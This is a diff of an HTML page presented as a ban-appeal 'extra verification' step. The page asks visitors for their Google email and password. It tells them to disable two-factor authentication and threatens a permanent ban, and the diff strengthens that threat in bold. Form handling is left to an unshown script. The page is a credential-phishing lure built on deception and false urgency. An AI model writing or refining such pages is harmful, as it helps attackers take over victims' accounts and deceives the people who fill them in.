--- a/appeal-tomb/index.html
+++ b/appeal-tomb/index.html
@@ -6,7 +6,7 @@
 <title>Extra Verification Required</title>
 </head>
 <link rel="stylesheet" href="https://cmd-hue.github.io/appeal.css">
-<body>
+<body width="100%" height="100%">
 <center>
 <h2>Extra Appeal Info</h2>
 <h5>In order for you to get properly appealed, please enter your Google Details Below</h5>
@@ -16,7 +16,7 @@
     <input type="password" id="pss" placeholder="Password" required>
     <button type="submit">Send</button>
   </form>
-<h5>You must not have 2FA Enabled and you have to be registered or your appeal will be permanent.</h5>
+<h5>You must not have 2FA Enabled and you have to be registered or your <b>ban</b> will be <b>permanent</b>>.</h5>
 </center>
   <script src="appeal-part2.js"></script>
   <script src="title.js"></script>
